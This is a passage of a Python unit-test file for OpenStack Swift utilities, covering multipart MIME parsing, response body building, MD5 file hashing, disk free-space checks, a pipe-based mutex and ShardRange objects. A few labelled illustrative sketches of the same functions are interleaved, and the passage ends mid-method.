class TestIterMultipartMimeDocuments(unittest.TestCase): def test_bad_start(self): it = utils.iter_multipart_mime_documents(BytesIO(b'blah'), b'unique') exc = None try: next(it) except MimeInvalid as err: exc = err self.assertTrue('invalid starting boundary' in str(exc)) self.assertTrue('--unique' in str(exc)) def test_empty(self): it = utils.iter_multipart_mime_documents(BytesIO(b'--unique'), b'unique') fp = next(it) self.assertEqual(fp.read(), b'') self.assertRaises(StopIteration, next, it) def test_basic(self): it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nabcdefg\r\n--unique--'), b'unique') fp = next(it) self.assertEqual(fp.read(), b'abcdefg') self.assertRaises(StopIteration, next, it) def test_basic2(self): it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'), b'unique') fp = next(it) self.assertEqual(fp.read(), b'abcdefg') fp = next(it) self.assertEqual(fp.read(), b'hijkl') self.assertRaises(StopIteration, next, it) def test_tiny_reads(self): it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'), b'unique') fp = next(it) self.assertEqual(fp.read(2), b'ab') self.assertEqual(fp.read(2), b'cd') self.assertEqual(fp.read(2), b'ef') self.assertEqual(fp.read(2), b'g') self.assertEqual(fp.read(2), b'') fp = next(it) self.assertEqual(fp.read(), b'hijkl') self.assertRaises(StopIteration, next, it) def test_big_reads(self): it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'), b'unique') fp = next(it) self.assertEqual(fp.read(65536), b'abcdefg') self.assertEqual(fp.read(), b'') fp = next(it) 
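# --- Illustrative sketch, not part of the original test module -------------
# The two small header parsers exercised in this file, shown with the same
# well-formed inputs the tests use.  Assumes swift is importable.
def _demo_header_parsers():
    from swift.common.utils import (
        parse_content_range, parse_content_disposition)

    start, end, total = parse_content_range("bytes 100-200/300")
    # -> (100, 200, 300); malformed ranges raise ValueError

    name, attrs = parse_content_disposition(
        'form-data; name="somefile"; filename="test.html"')
    # -> ('form-data', {'name': 'somefile', 'filename': 'test.html'})
    return (start, end, total), (name, attrs)
# ---------------------------------------------------------------------------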
self.assertEqual(fp.read(), b'hijkl') self.assertRaises(StopIteration, next, it) def test_leading_crlfs(self): it = utils.iter_multipart_mime_documents( BytesIO(b'\r\n\r\n\r\n--unique\r\nabcdefg\r\n' b'--unique\r\nhijkl\r\n--unique--'), b'unique') fp = next(it) self.assertEqual(fp.read(65536), b'abcdefg') self.assertEqual(fp.read(), b'') fp = next(it) self.assertEqual(fp.read(), b'hijkl') self.assertRaises(StopIteration, next, it) def test_broken_mid_stream(self): # We go ahead and accept whatever is sent instead of rejecting the # whole request, in case the partial form is still useful. it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nabc'), b'unique') fp = next(it) self.assertEqual(fp.read(), b'abc') self.assertRaises(StopIteration, next, it) def test_readline(self): it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n\r\n' b'jkl\r\n\r\n--unique--'), b'unique') fp = next(it) self.assertEqual(fp.readline(), b'ab\r\n') self.assertEqual(fp.readline(), b'cd\ref\ng') self.assertEqual(fp.readline(), b'') fp = next(it) self.assertEqual(fp.readline(), b'hi\r\n') self.assertEqual(fp.readline(), b'\r\n') self.assertEqual(fp.readline(), b'jkl\r\n') self.assertRaises(StopIteration, next, it) def test_readline_with_tiny_chunks(self): it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n' b'\r\njkl\r\n\r\n--unique--'), b'unique', read_chunk_size=2) fp = next(it) self.assertEqual(fp.readline(), b'ab\r\n') self.assertEqual(fp.readline(), b'cd\ref\ng') self.assertEqual(fp.readline(), b'') fp = next(it) self.assertEqual(fp.readline(), b'hi\r\n') self.assertEqual(fp.readline(), b'\r\n') self.assertEqual(fp.readline(), b'jkl\r\n') self.assertRaises(StopIteration, next, it) class TestParseMimeHeaders(unittest.TestCase): def test_parse_mime_headers(self): doc_file = BytesIO(b"""Content-Disposition: form-data; name="file_size" Foo: Bar NOT-title-cAsED: quux Connexion: =?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?= Status: =?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?= Latin-1: Resincronizaci\xf3n realizada con \xe9xito Utf-8: \xd0\xba\xd0\xbe\xd0\xbd\xd1\x82\xd0\xb5\xd0\xb9\xd0\xbd\xd0\xb5\xd1\x80 This is the body """) headers = utils.parse_mime_headers(doc_file) utf8 = u'\u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440' if six.PY2: utf8 = utf8.encode('utf-8') expected_headers = { 'Content-Disposition': 'form-data; name="file_size"', 'Foo': "Bar", 'Not-Title-Cased': "quux", # Encoded-word or non-ASCII values are treated just like any other # bytestring (at least for now) 'Connexion': "=?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=", 'Status': "=?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=", 'Latin-1': "Resincronizaci\xf3n realizada con \xe9xito", 'Utf-8': utf8, } self.assertEqual(expected_headers, headers) self.assertEqual(b"This is the body\n", doc_file.read()) class FakeResponse(object): def __init__(self, status, headers, body): self.status = status self.headers = HeaderKeyDict(headers) self.body = BytesIO(body) def getheader(self, header_name): return str(self.headers.get(header_name, '')) def getheaders(self): return self.headers.items() def read(self, length=None): return self.body.read(length) def readline(self, length=None): return self.body.readline(length) class TestDocumentItersToHTTPResponseBody(unittest.TestCase): def test_no_parts(self): body = utils.document_iters_to_http_response_body( iter([]), 'dontcare', multipart=False, logger=FakeLogger()) self.assertEqual(body, '') 
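# --- Illustrative sketch, not part of the original test module -------------
# document_iters_to_http_response_body() turns an iterator of part
# descriptors into a response body, adding MIME framing when multipart=True.
# Assumes swift is importable; the single part below and the use of a plain
# stdlib logger (instead of the suite's FakeLogger) are illustrative choices.
def _demo_response_body_from_parts():
    import logging
    from io import BytesIO
    from swift.common.utils import document_iters_to_http_response_body

    part = b"hello"
    doc_iters = [{'part_iter': iter(BytesIO(part).read, b'')}]
    body = b''.join(document_iters_to_http_response_body(
        iter(doc_iters), b'dontcare', multipart=False,
        logger=logging.getLogger(__name__)))
    return body                           # -> b"hello" when multipart=False
# ---------------------------------------------------------------------------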
def test_single_part(self): body = b"time flies like an arrow; fruit flies like a banana" doc_iters = [{'part_iter': iter(BytesIO(body).read, b'')}] resp_body = b''.join( utils.document_iters_to_http_response_body( iter(doc_iters), b'dontcare', multipart=False, logger=FakeLogger())) self.assertEqual(resp_body, body) def test_multiple_parts(self): part1 = b"two peanuts were walking down a railroad track" part2 = b"and one was a salted. ... peanut." doc_iters = [{ 'start_byte': 88, 'end_byte': 133, 'content_type': 'application/peanut', 'entity_length': 1024, 'part_iter': iter(BytesIO(part1).read, b''), }, { 'start_byte': 500, 'end_byte': 532, 'content_type': 'application/salted', 'entity_length': 1024, 'part_iter': iter(BytesIO(part2).read, b''), }] resp_body = b''.join( utils.document_iters_to_http_response_body( iter(doc_iters), b'boundaryboundary', multipart=True, logger=FakeLogger())) self.assertEqual(resp_body, ( b"--boundaryboundary\r\n" + # This is a little too strict; we don't actually care that the # headers are in this order, but the test is much more legible # this way. b"Content-Type: application/peanut\r\n" + b"Content-Range: bytes 88-133/1024\r\n" + b"\r\n" + part1 + b"\r\n" + b"--boundaryboundary\r\n" b"Content-Type: application/salted\r\n" + b"Content-Range: bytes 500-532/1024\r\n" + b"\r\n" + part2 + b"\r\n" + b"--boundaryboundary--")) def test_closed_part_iterator(self): print('test') useful_iter_mock = mock.MagicMock() useful_iter_mock.__iter__.return_value = [''] body_iter = utils.document_iters_to_http_response_body( iter([{'part_iter': useful_iter_mock}]), 'dontcare', multipart=False, logger=FakeLogger()) body = '' for s in body_iter: body += s self.assertEqual(body, '') useful_iter_mock.close.assert_called_once_with() # Calling "close" on the mock will now raise an AttributeError del useful_iter_mock.close body_iter = utils.document_iters_to_http_response_body( iter([{'part_iter': useful_iter_mock}]), 'dontcare', multipart=False, logger=FakeLogger()) body = '' for s in body_iter: body += s class TestPairs(unittest.TestCase): def test_pairs(self): items = [10, 20, 30, 40, 50, 60] got_pairs = set(utils.pairs(items)) self.assertEqual(got_pairs, set([(10, 20), (10, 30), (10, 40), (10, 50), (10, 60), (20, 30), (20, 40), (20, 50), (20, 60), (30, 40), (30, 50), (30, 60), (40, 50), (40, 60), (50, 60)])) class TestSocketStringParser(unittest.TestCase): def test_socket_string_parser(self): default = 1337 addrs = [('1.2.3.4', '1.2.3.4', default), ('1.2.3.4:5000', '1.2.3.4', 5000), ('[dead:beef::1]', 'dead:beef::1', default), ('[dead:beef::1]:5000', 'dead:beef::1', 5000), ('example.com', 'example.com', default), ('example.com:5000', 'example.com', 5000), ('foo.1-2-3.bar.com:5000', 'foo.1-2-3.bar.com', 5000), ('1.2.3.4:10:20', None, None), ('dead:beef::1:5000', None, None)] for addr, expected_host, expected_port in addrs: if expected_host: host, port = utils.parse_socket_string(addr, default) self.assertEqual(expected_host, host) self.assertEqual(expected_port, int(port)) else: with self.assertRaises(ValueError): utils.parse_socket_string(addr, default) class TestHashForFileFunction(unittest.TestCase): def setUp(self): self.tempfilename = tempfile.mktemp() def tearDown(self): try: os.unlink(self.tempfilename) except OSError: pass def test_hash_for_file_smallish(self): stub_data = b'some data' with open(self.tempfilename, 'wb') as fd: fd.write(stub_data) with mock.patch('swift.common.utils.md5') as mock_md5: mock_hasher = mock_md5.return_value rv = 
utils.md5_hash_for_file(self.tempfilename) self.assertTrue(mock_hasher.hexdigest.called) self.assertEqual(rv, mock_hasher.hexdigest.return_value) self.assertEqual([mock.call(stub_data)], mock_hasher.update.call_args_list) def test_hash_for_file_big(self): num_blocks = 10 block_size = utils.MD5_BLOCK_READ_BYTES truncate = 523 start_char = ord('a') expected_blocks = [chr(i).encode('utf8') * block_size for i in range(start_char, start_char + num_blocks)] full_data = b''.join(expected_blocks) trimmed_data = full_data[:-truncate] # sanity self.assertEqual(len(trimmed_data), block_size * num_blocks - truncate) with open(self.tempfilename, 'wb') as fd: fd.write(trimmed_data) with mock.patch('swift.common.utils.md5') as mock_md5: mock_hasher = mock_md5.return_value rv = utils.md5_hash_for_file(self.tempfilename) self.assertTrue(mock_hasher.hexdigest.called) self.assertEqual(rv, mock_hasher.hexdigest.return_value) self.assertEqual(num_blocks, len(mock_hasher.update.call_args_list)) found_blocks = [] for i, (expected_block, call) in enumerate(zip( expected_blocks, mock_hasher.update.call_args_list)): args, kwargs = call self.assertEqual(kwargs, {}) self.assertEqual(1, len(args)) block = args[0] if i < num_blocks - 1: self.assertEqual(block, expected_block) else: self.assertEqual(block, expected_block[:-truncate]) found_blocks.append(block) self.assertEqual(b''.join(found_blocks), trimmed_data) def test_hash_for_file_empty(self): with open(self.tempfilename, 'wb'): pass with mock.patch('swift.common.utils.md5') as mock_md5: mock_hasher = mock_md5.return_value rv = utils.md5_hash_for_file(self.tempfilename) self.assertTrue(mock_hasher.hexdigest.called) self.assertIs(rv, mock_hasher.hexdigest.return_value) self.assertEqual([], mock_hasher.update.call_args_list) def test_hash_for_file_brittle(self): data_to_expected_hash = { b'': 'd41d8cd98f00b204e9800998ecf8427e', b'some data': '1e50210a0202497fb79bc38b6ade6c34', (b'a' * 4096 * 10)[:-523]: '06a41551609656c85f14f659055dc6d3', } # unlike some other places where the concrete implementation really # matters for backwards compatibility these brittle tests are probably # not needed or justified, if a future maintainer rips them out later # they're probably doing the right thing failures = [] for stub_data, expected_hash in data_to_expected_hash.items(): with open(self.tempfilename, 'wb') as fd: fd.write(stub_data) rv = utils.md5_hash_for_file(self.tempfilename) try: self.assertEqual(expected_hash, rv) except AssertionError: trim_cap = 80 if len(stub_data) > trim_cap: stub_data = '%s...<truncated>' % stub_data[:trim_cap] failures.append('hash for %r was %s instead of expected %s' % ( stub_data, rv, expected_hash)) if failures: self.fail('Some data did not compute expected hash:\n' + '\n'.join(failures)) class TestFsHasFreeSpace(unittest.TestCase): def test_bytes(self): fake_result = posix.statvfs_result([ 4096, # f_bsize 4096, # f_frsize 2854907, # f_blocks 1984802, # f_bfree (free blocks for root) 1728089, # f_bavail (free blocks for non-root) 1280000, # f_files 1266040, # f_ffree, 1266040, # f_favail, 4096, # f_flag 255, # f_namemax ]) with mock.patch('os.statvfs', return_value=fake_result): self.assertTrue(utils.fs_has_free_space("/", 0, False)) self.assertTrue(utils.fs_has_free_space("/", 1, False)) # free space left = f_bavail * f_bsize = 7078252544 self.assertTrue(utils.fs_has_free_space("/", 7078252544, False)) self.assertFalse(utils.fs_has_free_space("/", 7078252545, False)) self.assertFalse(utils.fs_has_free_space("/", 2 ** 64, False)) def 
test_percent(self): fake_result = posix.statvfs_result([ 4096, # f_bsize 4096, # f_frsize 2854907, # f_blocks 1984802, # f_bfree (free blocks for root) 1728089, # f_bavail (free blocks for non-root) 1280000, # f_files 1266040, # f_ffree, 1266040, # f_favail, 4096, # f_flag 255, # f_namemax ]) with mock.patch('os.statvfs', return_value=fake_result): self.assertTrue(utils.fs_has_free_space("/", 0, True)) self.assertTrue(utils.fs_has_free_space("/", 1, True)) # percentage of free space for the faked statvfs is 60% self.assertTrue(utils.fs_has_free_space("/", 60, True)) self.assertFalse(utils.fs_has_free_space("/", 61, True)) self.assertFalse(utils.fs_has_free_space("/", 100, True)) self.assertFalse(utils.fs_has_free_space("/", 110, True)) class TestSetSwiftDir(unittest.TestCase): def setUp(self): self.swift_dir = tempfile.mkdtemp() self.swift_conf = os.path.join(self.swift_dir, 'swift.conf') self.policy_name = ''.join(random.sample(string.ascii_letters, 20)) with open(self.swift_conf, "wt") as sc: sc.write(''' [swift-hash] swift_hash_path_suffix = changeme [storage-policy:0] name = default default = yes [storage-policy:1] name = %s ''' % self.policy_name) def tearDown(self): shutil.rmtree(self.swift_dir, ignore_errors=True) def test_set_swift_dir(self): set_swift_dir(None) reload_storage_policies() self.assertIsNone(POLICIES.get_by_name(self.policy_name)) set_swift_dir(self.swift_dir) reload_storage_policies() self.assertIsNotNone(POLICIES.get_by_name(self.policy_name)) class TestPipeMutex(unittest.TestCase): def setUp(self): self.mutex = utils.PipeMutex() def tearDown(self): self.mutex.close() def test_nonblocking(self): evt_lock1 = eventlet.event.Event() evt_lock2 = eventlet.event.Event() evt_unlock = eventlet.event.Event() def get_the_lock(): self.mutex.acquire() evt_lock1.send('got the lock') evt_lock2.wait() self.mutex.release() evt_unlock.send('released the lock') eventlet.spawn(get_the_lock) evt_lock1.wait() # Now, the other greenthread has the lock. self.assertFalse(self.mutex.acquire(blocking=False)) evt_lock2.send('please release the lock') evt_unlock.wait() # The other greenthread has released the lock. 
self.assertTrue(self.mutex.acquire(blocking=False)) def test_recursive(self): self.assertTrue(self.mutex.acquire(blocking=False)) self.assertTrue(self.mutex.acquire(blocking=False)) def try_acquire_lock(): return self.mutex.acquire(blocking=False) self.assertFalse(eventlet.spawn(try_acquire_lock).wait()) self.mutex.release() self.assertFalse(eventlet.spawn(try_acquire_lock).wait()) self.mutex.release() self.assertTrue(eventlet.spawn(try_acquire_lock).wait()) def test_release_without_acquire(self): self.assertRaises(RuntimeError, self.mutex.release) def test_too_many_releases(self): self.mutex.acquire() self.mutex.release() self.assertRaises(RuntimeError, self.mutex.release) def test_wrong_releaser(self): self.mutex.acquire() with quiet_eventlet_exceptions(): self.assertRaises(RuntimeError, eventlet.spawn(self.mutex.release).wait) def test_blocking(self): evt = eventlet.event.Event() sequence = [] def coro1(): eventlet.sleep(0) # let coro2 go self.mutex.acquire() sequence.append('coro1 acquire') evt.send('go') self.mutex.release() sequence.append('coro1 release') def coro2(): evt.wait() # wait for coro1 to start us self.mutex.acquire() sequence.append('coro2 acquire') self.mutex.release() sequence.append('coro2 release') c1 = eventlet.spawn(coro1) c2 = eventlet.spawn(coro2) c1.wait() c2.wait() self.assertEqual(sequence, [ 'coro1 acquire', 'coro1 release', 'coro2 acquire', 'coro2 release']) def test_blocking_tpool(self): # Note: this test's success isn't a guarantee that the mutex is # working. However, this test's failure means that the mutex is # definitely broken. sequence = [] def do_stuff(): n = 10 while n > 0: self.mutex.acquire() sequence.append("<") eventlet.sleep(0.0001) sequence.append(">") self.mutex.release() n -= 1 greenthread1 = eventlet.spawn(do_stuff) greenthread2 = eventlet.spawn(do_stuff) real_thread1 = eventlet.patcher.original('threading').Thread( target=do_stuff) real_thread1.start() real_thread2 = eventlet.patcher.original('threading').Thread( target=do_stuff) real_thread2.start() greenthread1.wait() greenthread2.wait() real_thread1.join() real_thread2.join() self.assertEqual(''.join(sequence), "<>" * 40) def test_blocking_preserves_ownership(self): pthread1_event = eventlet.patcher.original('threading').Event() pthread2_event1 = eventlet.patcher.original('threading').Event() pthread2_event2 = eventlet.patcher.original('threading').Event() thread_id = [] owner = [] def pthread1(): thread_id.append(id(eventlet.greenthread.getcurrent())) self.mutex.acquire() owner.append(self.mutex.owner) pthread2_event1.set() orig_os_write = utils.os.write def patched_os_write(*a, **kw): try: return orig_os_write(*a, **kw) finally: pthread1_event.wait() with mock.patch.object(utils.os, 'write', patched_os_write): self.mutex.release() pthread2_event2.set() def pthread2(): pthread2_event1.wait() # ensure pthread1 acquires lock first thread_id.append(id(eventlet.greenthread.getcurrent())) self.mutex.acquire() pthread1_event.set() pthread2_event2.wait() owner.append(self.mutex.owner) self.mutex.release() real_thread1 = eventlet.patcher.original('threading').Thread( target=pthread1) real_thread1.start() real_thread2 = eventlet.patcher.original('threading').Thread( target=pthread2) real_thread2.start() real_thread1.join() real_thread2.join() self.assertEqual(thread_id, owner) self.assertIsNone(self.mutex.owner) @classmethod def tearDownClass(cls): # PipeMutex turns this off when you instantiate one eventlet.debug.hub_prevent_multiple_readers(True) class TestDistributeEvenly(unittest.TestCase): 
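# --- Illustrative sketch, not part of the original test module -------------
# distribute_evenly() deals items round-robin into the requested number of
# buckets, so bucket sizes differ by at most one.  Assumes swift is
# importable; the input range is arbitrary.
def _demo_distribute_evenly():
    from swift.common.utils import distribute_evenly

    buckets = distribute_evenly(range(11), 3)
    # -> [[0, 3, 6, 9], [1, 4, 7, 10], [2, 5, 8]]
    return buckets
# ---------------------------------------------------------------------------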
def test_evenly_divided(self): out = utils.distribute_evenly(range(12), 3) self.assertEqual(out, [ [0, 3, 6, 9], [1, 4, 7, 10], [2, 5, 8, 11], ]) out = utils.distribute_evenly(range(12), 4) self.assertEqual(out, [ [0, 4, 8], [1, 5, 9], [2, 6, 10], [3, 7, 11], ]) def test_uneven(self): out = utils.distribute_evenly(range(11), 3) self.assertEqual(out, [ [0, 3, 6, 9], [1, 4, 7, 10], [2, 5, 8], ]) def test_just_one(self): out = utils.distribute_evenly(range(5), 1) self.assertEqual(out, [[0, 1, 2, 3, 4]]) def test_more_buckets_than_items(self): out = utils.distribute_evenly(range(5), 7) self.assertEqual(out, [[0], [1], [2], [3], [4], [], []]) class TestShardRange(unittest.TestCase): def setUp(self): self.ts_iter = make_timestamp_iter() def test_min_max_bounds(self): # max self.assertEqual(utils.ShardRange.MAX, utils.ShardRange.MAX) self.assertFalse(utils.ShardRange.MAX > utils.ShardRange.MAX) self.assertFalse(utils.ShardRange.MAX < utils.ShardRange.MAX) for val in 'z', u'\u00e4': self.assertFalse(utils.ShardRange.MAX == val) self.assertFalse(val > utils.ShardRange.MAX) self.assertTrue(val < utils.ShardRange.MAX) self.assertTrue(utils.ShardRange.MAX > val) self.assertFalse(utils.ShardRange.MAX < val) self.assertEqual('', str(utils.ShardRange.MAX)) self.assertFalse(utils.ShardRange.MAX) self.assertTrue(utils.ShardRange.MAX == utils.ShardRange.MAX) self.assertFalse(utils.ShardRange.MAX != utils.ShardRange.MAX) self.assertTrue( utils.ShardRange.MaxBound() == utils.ShardRange.MaxBound()) self.assertFalse( utils.ShardRange.MaxBound() != utils.ShardRange.MaxBound()) # min self.assertEqual(utils.ShardRange.MIN, utils.ShardRange.MIN) self.assertFalse(utils.ShardRange.MIN > utils.ShardRange.MIN) self.assertFalse(utils.ShardRange.MIN < utils.ShardRange.MIN) for val in 'z', u'\u00e4': self.assertFalse(utils.ShardRange.MIN == val) self.assertFalse(val < utils.ShardRange.MIN) self.assertTrue(val > utils.ShardRange.MIN) self.assertTrue(utils.ShardRange.MIN < val) self.assertFalse(utils.ShardRange.MIN > val) self.assertFalse(utils.ShardRange.MIN) self.assertEqual('', str(utils.ShardRange.MIN)) self.assertFalse(utils.ShardRange.MIN) self.assertTrue(utils.ShardRange.MIN == utils.ShardRange.MIN) self.assertFalse(utils.ShardRange.MIN != utils.ShardRange.MIN) self.assertTrue( utils.ShardRange.MinBound() == utils.ShardRange.MinBound()) self.assertFalse( utils.ShardRange.MinBound() != utils.ShardRange.MinBound()) self.assertFalse(utils.ShardRange.MAX == utils.ShardRange.MIN) self.assertFalse(utils.ShardRange.MIN == utils.ShardRange.MAX) self.assertTrue(utils.ShardRange.MAX != utils.ShardRange.MIN) self.assertTrue(utils.ShardRange.MIN != utils.ShardRange.MAX) self.assertEqual(utils.ShardRange.MAX, max(utils.ShardRange.MIN, utils.ShardRange.MAX)) self.assertEqual(utils.ShardRange.MIN, min(utils.ShardRange.MIN, utils.ShardRange.MAX)) def test_shard_range_initialisation(self): def assert_initialisation_ok(params, expected): pr = utils.ShardRange(**params) self.assertDictEqual(dict(pr), expected) def assert_initialisation_fails(params, err_type=ValueError): with self.assertRaises(err_type): utils.ShardRange(**params) ts_1 = next(self.ts_iter) ts_2 = next(self.ts_iter) ts_3 = next(self.ts_iter) ts_4 = next(self.ts_iter) empty_run = dict(name=None, timestamp=None, lower=None, upper=None, object_count=0, bytes_used=0, meta_timestamp=None, deleted=0, state=utils.ShardRange.FOUND, state_timestamp=None, epoch=None) # name, timestamp must be given assert_initialisation_fails(empty_run.copy()) 
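# --- Illustrative sketch, not part of the original test module -------------
# Basic ShardRange construction as exercised by the tests above: the name
# must look like <account>/<container>, and empty lower/upper bounds expand
# to the special MIN/MAX sentinels covering the whole namespace.  Assumes
# swift is importable; the names and bounds below are hypothetical.
def _demo_shard_range_basics():
    from swift.common import utils

    ts = utils.Timestamp.now()
    middle = utils.ShardRange('a/c_shard', ts, lower='d', upper='m')
    whole = utils.ShardRange('a/c_all', ts)     # defaults to MIN .. MAX
    return middle.lower_str, middle.upper_str, whole.entire_namespace()
# ---------------------------------------------------------------------------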
assert_initialisation_fails(dict(empty_run, name='a/c'), TypeError) assert_initialisation_fails(dict(empty_run, timestamp=ts_1)) # name must be form a/c assert_initialisation_fails(dict(empty_run, name='c', timestamp=ts_1)) assert_initialisation_fails(dict(empty_run, name='', timestamp=ts_1)) assert_initialisation_fails(dict(empty_run, name='/a/c', timestamp=ts_1)) assert_initialisation_fails(dict(empty_run, name='/c', timestamp=ts_1)) # lower, upper can be None expect = dict(name='a/c', timestamp=ts_1.internal, lower='', upper='', object_count=0, bytes_used=0, meta_timestamp=ts_1.internal, deleted=0, state=utils.ShardRange.FOUND, state_timestamp=ts_1.internal, epoch=None) assert_initialisation_ok(dict(empty_run, name='a/c', timestamp=ts_1), expect) assert_initialisation_ok(dict(name='a/c', timestamp=ts_1), expect) good_run = dict(name='a/c', timestamp=ts_1, lower='l', upper='u', object_count=2, bytes_used=10, meta_timestamp=ts_2, deleted=0, state=utils.ShardRange.CREATED, state_timestamp=ts_3.internal, epoch=ts_4) expect.update({'lower': 'l', 'upper': 'u', 'object_count': 2, 'bytes_used': 10, 'meta_timestamp': ts_2.internal, 'state': utils.ShardRange.CREATED, 'state_timestamp': ts_3.internal, 'epoch': ts_4}) assert_initialisation_ok(good_run.copy(), expect) # obj count and bytes used as int strings good_str_run = good_run.copy() good_str_run.update({'object_count': '2', 'bytes_used': '10'}) assert_initialisation_ok(good_str_run, expect) good_no_meta = good_run.copy() good_no_meta.pop('meta_timestamp') assert_initialisation_ok(good_no_meta, dict(expect, meta_timestamp=ts_1.internal)) good_deleted = good_run.copy() good_deleted['deleted'] = 1 assert_initialisation_ok(good_deleted, dict(expect, deleted=1)) assert_initialisation_fails(dict(good_run, timestamp='water balloon')) assert_initialisation_fails( dict(good_run, meta_timestamp='water balloon')) assert_initialisation_fails(dict(good_run, lower='water balloon')) assert_initialisation_fails(dict(good_run, upper='balloon')) assert_initialisation_fails( dict(good_run, object_count='water balloon')) assert_initialisation_fails(dict(good_run, bytes_used='water ballon')) assert_initialisation_fails(dict(good_run, object_count=-1)) assert_initialisation_fails(dict(good_run, bytes_used=-1)) assert_initialisation_fails(dict(good_run, state=-1)) assert_initialisation_fails(dict(good_run, state_timestamp='not a ts')) assert_initialisation_fails(dict(good_run, name='/a/c')) assert_initialisation_fails(dict(good_run, name='/a/c/')) assert_initialisation_fails(dict(good_run, name='a/c/')) assert_initialisation_fails(dict(good_run, name='a')) assert_initialisation_fails(dict(good_run, name='')) def _check_to_from_dict(self, lower, upper): ts_1 = next(self.ts_iter) ts_2 = next(self.ts_iter) ts_3 = next(self.ts_iter) ts_4 = next(self.ts_iter) sr = utils.ShardRange('a/test', ts_1, lower, upper, 10, 100, ts_2, state=None, state_timestamp=ts_3, epoch=ts_4) sr_dict = dict(sr) expected = { 'name': 'a/test', 'timestamp': ts_1.internal, 'lower': lower, 'upper': upper, 'object_count': 10, 'bytes_used': 100, 'meta_timestamp': ts_2.internal, 'deleted': 0, 'state': utils.ShardRange.FOUND, 'state_timestamp': ts_3.internal, 'epoch': ts_4} self.assertEqual(expected, sr_dict) self.assertIsInstance(sr_dict['lower'], six.string_types) self.assertIsInstance(sr_dict['upper'], six.string_types) sr_new = utils.ShardRange.from_dict(sr_dict) self.assertEqual(sr, sr_new) self.assertEqual(sr_dict, dict(sr_new)) sr_new = utils.ShardRange(**sr_dict) self.assertEqual(sr, sr_new) 
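# --- Illustrative sketch, not part of the original test module -------------
# A ShardRange can be flattened to a plain dict and rebuilt, as the helper
# above verifies.  from_dict() requires every key, while passing the dict as
# keyword arguments tolerates missing optional keys (but not name/timestamp).
# Assumes swift is importable; the bounds and counts are hypothetical.
def _demo_shard_range_round_trip():
    from swift.common import utils

    sr = utils.ShardRange('a/c', utils.Timestamp.now(), 'l', 'u',
                          object_count=10, bytes_used=100)
    as_dict = dict(sr)                      # primitive, JSON-friendly values
    rebuilt = utils.ShardRange.from_dict(as_dict)
    also_rebuilt = utils.ShardRange(**as_dict)
    return rebuilt == sr and also_rebuilt == sr     # -> True
# ---------------------------------------------------------------------------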
self.assertEqual(sr_dict, dict(sr_new)) for key in sr_dict: bad_dict = dict(sr_dict) bad_dict.pop(key) with self.assertRaises(KeyError): utils.ShardRange.from_dict(bad_dict) # But __init__ still (generally) works! if key not in ('name', 'timestamp'): utils.ShardRange(**bad_dict) else: with self.assertRaises(TypeError): utils.ShardRange(**bad_dict) def test_to_from_dict(self): self._check_to_from_dict('l', 'u') self._check_to_from_dict('', '') def test_timestamp_setter(self): ts_1 = next(self.ts_iter) sr = utils.ShardRange('a/test', ts_1, 'l', 'u', 0, 0, None) self.assertEqual(ts_1, sr.timestamp) ts_2 = next(self.ts_iter) sr.timestamp = ts_2 self.assertEqual(ts_2, sr.timestamp) sr.timestamp = 0 self.assertEqual(utils.Timestamp(0), sr.timestamp) with self.assertRaises(TypeError): sr.timestamp = None def test_meta_timestamp_setter(self): ts_1 = next(self.ts_iter) sr = utils.ShardRange('a/test', ts_1, 'l', 'u', 0, 0, None) self.assertEqual(ts_1, sr.timestamp) self.assertEqual(ts_1, sr.meta_timestamp) ts_2 = next(self.ts_iter) sr.meta_timestamp = ts_2 self.assertEqual(ts_1, sr.timestamp) self.assertEqual(ts_2, sr.meta_timestamp) ts_3 = next(self.ts_iter) sr.timestamp = ts_3 self.assertEqual(ts_3, sr.timestamp) self.assertEqual(ts_2, sr.meta_timestamp) # meta_timestamp defaults to tracking timestamp sr.meta_timestamp = None self.assertEqual(ts_3, sr.timestamp) self.assertEqual(ts_3, sr.meta_timestamp) ts_4 = next(self.ts_iter) sr.timestamp = ts_4 self.assertEqual(ts_4, sr.timestamp) self.assertEqual(ts_4, sr.meta_timestamp) sr.meta_timestamp = 0 self.assertEqual(ts_4, sr.timestamp) self.assertEqual(utils.Timestamp(0), sr.meta_timestamp) def test_update_meta(self): ts_1 = next(self.ts_iter) sr = utils.ShardRange('a/test', ts_1, 'l', 'u', 0, 0, None) with mock_timestamp_now(next(self.ts_iter)) as now: sr.update_meta(9, 99) self.assertEqual(9, sr.object_count) self.assertEqual(99, sr.bytes_used) self.assertEqual(now, sr.meta_timestamp) with mock_timestamp_now(next(self.ts_iter)) as now: sr.update_meta(99, 999, None) self.assertEqual(99, sr.object_count) self.assertEqual(999, sr.bytes_used) self.assertEqual(now, sr.meta_timestamp) ts_2 = next(self.ts_iter) sr.update_meta(21, 2112, ts_2) self.assertEqual(21, sr.object_count) self.assertEqual(2112, sr.bytes_used) self.assertEqual(ts_2, sr.meta_timestamp) sr.update_meta('11', '12') self.assertEqual(11, sr.object_count) self.assertEqual(12, sr.bytes_used) def check_bad_args(*args): with self.assertRaises(ValueError): sr.update_meta(*args) check_bad_args('bad', 10) check_bad_args(10, 'bad') check_bad_args(10, 11, 'bad') def test_increment_meta(self): ts_1 = next(self.ts_iter) sr = utils.ShardRange('a/test', ts_1, 'l', 'u', 1, 2, None) with mock_timestamp_now(next(self.ts_iter)) as now: sr.increment_meta(9, 99) self.assertEqual(10, sr.object_count) self.assertEqual(101, sr.bytes_used) self.assertEqual(now, sr.meta_timestamp) sr.increment_meta('11', '12') self.assertEqual(21, sr.object_count) self.assertEqual(113, sr.bytes_used) def check_bad_args(*args): with self.assertRaises(ValueError): 